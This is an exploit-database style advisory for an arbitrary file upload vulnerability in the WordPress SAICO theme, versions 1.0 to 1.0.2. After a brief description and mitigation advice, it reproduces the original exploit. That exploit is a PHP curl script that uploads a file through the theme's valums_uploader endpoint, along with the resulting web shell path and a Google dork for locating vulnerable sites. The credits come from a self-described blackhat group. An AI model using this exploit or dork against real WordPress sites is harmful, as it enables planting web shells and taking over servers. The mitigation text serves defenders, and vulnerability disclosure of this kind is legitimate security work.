WordPress SAICO theme Arbitrary File Upload Vulnerability

vendor:

SAICO

by:

Byakuya

7,5

CVSS

HIGH

Arbitrary File Upload

434

CWE

Product Name: SAICO

Affected Version From: v1.0

Affected Version To: v1.0.2

Patch Exists: YES

Related CWE: N/A

CPE: a:themeforest:saico

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: WordPress

2013

WordPress SAICO theme Arbitrary File Upload Vulnerability

An arbitrary file upload vulnerability in the WordPress SAICO theme allows an attacker to upload a malicious PHP file to the server. This can be done by sending a POST request to the php.php file in the framework/_scripts/valums_uploader/ directory with the malicious file as a parameter. The malicious file can then be accessed at the path http://site.com/wordpress/wp-content/uploads/2013/10/up.php

Mitigation:

Ensure that the application is up to date and that all security patches are applied. Additionally, ensure that the application is configured to only allow the upload of files with the appropriate MIME type.

Source

Exploit-DB raw data:

###################################################################################################
#_________            .___        _______                ___.   .__       
#\_   ___ \  ____   __| _/____    \      \   ______  _  _\_ |__ |__| ____ 
#/    \  \/ /  _ \ / __ |/ __ \   /   |   \_/ __ \ \/ \/ /| __ \|  |/ __ \
#\     \___(  <_> ) /_/ \  ___/  /    |    \  ___/\     / | \_\ \  \  ___/
# \______  /\____/\____ |\___  > \____|__  /\___  >\/\_/  |___  /__|\___  >
#        \/            \/    \/          \/     \/            \/        \/
###################################################################################################
# Exploit Title: WordPress SAICO theme Arbitrary File Upload Vulnerability
# Author: Byakuya
# Date: 10/19/2013
# Vendor Homepage: http://themeforest.net/
# Themes Link: http://themeforest.net/item/saico-powerful-wordpress-theme/2082434
# Affected Version: v1.0 - v1.0.2 
# Price: $45
# Category: webapps/php
# Google dork: inurl:wp-content/themes/saico/
###################################################################################################

# Exploit

<?php
$uploadfile = "up.php";
$ch = curl_init("http://site.com/wordpress/wp-content/themes/saico/framework/_scripts/valums_uploader/php.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('qqfile'=>"$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>

#Shell path: http://site.com/wordpress/wp-content/uploads/2013/10/up.php

#Credit: ./Byakuya ./Mr Ohsem ./Cai ./RatKid ./Agam ./Lord-Router ./X-Tuned ./Official Code-Newbie
#Facebook: https://www.facebook.com/CodeNewbieCrew
#Website: http://www.codenewbie.net
#Malaysia & Indonesia BlackHat
###################################################################################################